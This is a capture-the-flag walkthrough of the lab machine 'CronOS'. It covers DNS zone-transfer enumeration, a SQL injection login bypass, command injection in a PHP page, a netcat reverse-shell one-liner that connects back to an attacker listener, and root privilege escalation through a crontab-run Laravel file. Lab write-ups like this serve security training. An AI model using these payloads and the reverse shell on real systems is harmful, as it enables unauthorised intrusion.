Professional Documents
Culture Documents
Page 1 / 7
SYNOPSIS
CronOS focuses mainly on different vectors for enumeration and also emphasises the risks
associated with adding world-writable files to the root crontab. This machine also includes an
introductory-level SQL injection vulnerability.
Page 2 / 7
Enumeration
Nmap
Nmap reveals an OpenSSH server, a DNS server and an Apache server. Attempting to view the
website reveals only the default Apache page.
Page 3 / 7
Dig
Although the initial domain name must be guessed (cronos.htb), it is possible to enumerate the
remaining subdomains by doing a zone transfer. This can be accomplished with the command
dig axfr @10.10.10.13 cronos.htb after adding cronos.htb to the /etc/hosts file.
After adding admin.cronos.htb to the /etc/hosts file and browsing to it, an administrator login
page is presented.
Page 4 / 7
Exploitation
Login
After some trial and error, it appears that the Username field is vulnerable to SQL injection. By
commenting out the rest of the statement with the username admin’-- - the login form is
bypassed.
Welcome
It does not take long to figure out that the welcome.php page is vulnerable to command
injection. Many different methods work here, however the simplest is likely just using a semicolon
to add additional commands. However, script execution is stopped after the traceroute is run.
Page 5 / 7
By intercepting the response in Burp Suite, it is possible to modify the command entirely.
After removing the host variable, command injection is now trivial. Replace traceroute with the
desired command and send the request. Note that URL encoding the command is required in
some cases. Use the command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LAB IP>
<PORT>| >/tmp/f to connect to a local nc listener, which can be started by using the command nc
-nvlp <PORT>
Page 6 / 7
Privilege Escalation
LinEnum: https://github.com/rebootuser/LinEnum
Running LinEnum generates a fairly large list of information. One thing that stands out is the root
crontab, which runs the schedule() function in /var/www/laravel/app/console/Kernel.php.
Modifying the function allows for command execution as root by the scheduler system.
This can be used to modify other files to simplify obtaining a root shell, however in this case
obtaining the flag is all that is required.
Page 7 / 7